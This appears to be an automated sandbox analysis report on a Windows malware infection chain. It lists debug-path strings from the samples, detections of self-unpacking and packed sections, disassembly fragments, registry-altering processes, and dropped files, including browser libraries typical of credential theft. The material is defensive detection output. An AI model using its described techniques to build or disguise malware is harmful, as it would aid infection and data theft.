            Source: Binary string: YC:\kowad\hur_xez bejuwud_nucasa25 nima49\ler.pdb source: 6uVlPQSJ4e.exe, 00000000.00000000.2055147362.0000000000410000.00000002.00000001.01000000.00000003.sdmp, 6uVlPQSJ4e.exe, 00000000.00000002.2119831662.0000000000410000.00000002.00000001.01000000.00000003.sdmp, gtdirat, 00000006.00000000.2306948780.0000000000410000.00000002.00000001.01000000.00000005.sdmp, gtdirat, 00000006.00000002.2358003231.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: nss3.pdb@ source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: EfiGuardDxe.pdb7 source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\kowad\hur_xez bejuwud_nucasa25 nima49\ler.pdb source: 6uVlPQSJ4e.exe, 00000000.00000000.2055147362.0000000000410000.00000002.00000001.01000000.00000003.sdmp, 6uVlPQSJ4e.exe, 00000000.00000002.2119831662.0000000000410000.00000002.00000001.01000000.00000003.sdmp, gtdirat, 00000006.00000000.2306948780.0000000000410000.00000002.00000001.01000000.00000005.sdmp, gtdirat, 00000006.00000002.2358003231.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: symsrv.pdb source: 71C9.exe, 0000001D.00000002.3185463938.0000000003A09000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: !?C:\fub15\jekofesero\faduporixe_yaf.pdb source: DB15.exe, 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000B.00000000.2817926575.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000C.00000000.2819249973.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000010.00000002.2841208220.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000010.00000000.2836193602.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000011.00000000.2839475530.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000012.00000002.2842579793.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000012.00000000.2839477285.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000013.00000000.2840959577.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000015.00000000.2960769899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000015.00000002.2966350391.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000016.00000000.2964684710.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000002.3049973246.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000000.3044970773.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001C.00000000.3046708932.0000000000410000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: mozglue.pdb source: build2.exe, 00000029.00000002.3578472192.000000006C48D000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: C:\bap\xipuvi-g.pdb source: 71C9.exe, 0000001D.00000000.3076477137.0000000000410000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: DB15.exe, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: .pdb.dbg source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: 71C9.exe, 0000001D.00000003.3083456233.000000000414B000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: 71C9.exe, 0000001D.00000002.3185463938.0000000003A09000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp
            Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000002B.00000002.3312441020.0000000000401000.00000020.00000001.01000000.00000017.sdmp, build3.exe, 0000002B.00000000.3160354253.0000000000401000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: 6C:\bap\xipuvi-g.pdb source: 71C9.exe, 0000001D.00000000.3076477137.0000000000410000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: 71C9.exe, 0000001D.00000003.3083456233.000000000414B000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: DB15.exe, 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: nss3.pdb source: build2.exe, 00000029.00000002.3579393951.000000006C64F000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000029.00000002.3572254159.000000001E938000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3573071758.0000000020E7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dbghelp.pdb source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\fub15\jekofesero\faduporixe_yaf.pdb source: DB15.exe, 0000000B.00000002.2819787929.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000B.00000000.2817926575.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 0000000C.00000000.2819249973.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000010.00000002.2841208220.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000010.00000000.2836193602.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000011.00000000.2839475530.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000012.00000002.2842579793.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000012.00000000.2839477285.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000013.00000000.2840959577.0000000000410000.00000002.00000001.01000000.00000006.sdmp, DB15.exe, 00000015.00000000.2960769899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000015.00000002.2966350391.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 00000016.00000000.2964684710.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000002.3049973246.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001B.00000000.3044970773.0000000000410000.00000002.00000001.01000000.00000008.sdmp, DB15.exe, 0000001C.00000000.3046708932.0000000000410000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000002B.00000002.3312441020.0000000000401000.00000020.00000001.01000000.00000017.sdmp, build3.exe, 0000002B.00000000.3160354253.0000000000401000.00000020.00000001.01000000.00000017.sdmp

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeUnpacked PE file: 0.2.6uVlPQSJ4e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Roaming\gtdiratUnpacked PE file: 6.2.gtdirat.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeUnpacked PE file: 12.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 17.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeUnpacked PE file: 19.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 22.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 28.2.DB15.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeUnpacked PE file: 29.2.71C9.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeUnpacked PE file: 41.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeUnpacked PE file: 44.2.71C9.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeUnpacked PE file: 12.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 17.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeUnpacked PE file: 19.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 22.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeUnpacked PE file: 28.2.DB15.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeUnpacked PE file: 29.2.71C9.exe.400000.5.unpack
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeUnpacked PE file: 41.2.build2.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeUnpacked PE file: 44.2.71C9.exe.400000.5.unpack
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,12_2_00412220
            Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp{
            Source: 71C9.exe.2.drStatic PE information: real checksum: 0x432b23 should be: 0x425aee
            Source: sqlm[1].dll.41.drStatic PE information: real checksum: 0x0 should be: 0x263795
            Source: A0B.exe.2.drStatic PE information: section name: .vmp
            Source: A0B.exe.2.drStatic PE information: section name: .vmp
            Source: A0B.exe.2.drStatic PE information: section name: .vmp{
            Source: A0B.exe.2.drStatic PE information: section name: .vmp{
            Source: A0B.exe.2.drStatic PE information: section name: .vmp{
            Source: build3.exe.19.drStatic PE information: section name: .kic
            Source: build3[1].exe.19.drStatic PE information: section name: .kic
            Source: sqlm[1].dll.41.drStatic PE information: section name: .00cfg
            Source: freebl3.dll.41.drStatic PE information: section name: .00cfg
            Source: freebl3[1].dll.41.drStatic PE information: section name: .00cfg
            Source: mozglue.dll.41.drStatic PE information: section name: .00cfg
            Source: mozglue[1].dll.41.drStatic PE information: section name: .00cfg
            Source: msvcp140.dll.41.drStatic PE information: section name: .didat
            Source: msvcp140[1].dll.41.drStatic PE information: section name: .didat
            Source: nss3.dll.41.drStatic PE information: section name: .00cfg
            Source: nss3[1].dll.41.drStatic PE information: section name: .00cfg
            Source: softokn3.dll.41.drStatic PE information: section name: .00cfg
            Source: softokn3[1].dll.41.drStatic PE information: section name: .00cfg
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004026D2 push ebx; ret 0_2_004026EA
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004026ED pushad ; ret 0_2_004026F4
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004026F7 push ebx; ret 0_2_00402714
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00402745 push edi; ret 0_2_0040276D
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_0040273B push edi; ret 0_2_00402742
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00402595 push ss; ret 0_2_0040259C
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_004027BB push edi; ret 0_2_0040276D
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C22822 push edi; ret 0_2_00C227D4
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C225FC push ss; ret 0_2_00C22603
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C227A2 push edi; ret 0_2_00C227A9
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C215A4 push AFD66869h; ret 0_2_00C215A9
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C227AC push edi; ret 0_2_00C227D4
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C22754 pushad ; ret 0_2_00C2275B
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C2275E push ebx; ret 0_2_00C2277B
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C22739 push ebx; ret 0_2_00C22751
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D288F0 pushad ; iretd 0_2_00D288F1
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D2DE93 push eax; iretd 0_2_00D2DE94
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D2E077 push ds; retf 0_2_00D2E079
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D2E07B push esi; iretd 0_2_00D2E07D
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D277E3 push AFD66869h; ret 0_2_00D277E8
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D289B2 push D23524A7h; retn 0006h0_2_00D289BA
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D2E103 push ecx; retf 0_2_00D2E105
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D2E139 push 4843A5D1h; retf 0_2_00D2E145
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004026D2 push ebx; ret 6_2_004026EA
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004026ED pushad ; ret 6_2_004026F4
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004026F7 push ebx; ret 6_2_00402714
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00402745 push edi; ret 6_2_0040276D
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_0040273B push edi; ret 6_2_00402742
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00402595 push ss; ret 6_2_0040259C
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_004027BB push edi; ret 6_2_0040276D
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00C72822 push edi; ret 6_2_00C727D4

            Persistence and Installation Behavior

            barindex
            Uses cmd line tools excessively to alter registry or file data
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DB15.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A0B.exeJump to dropped file
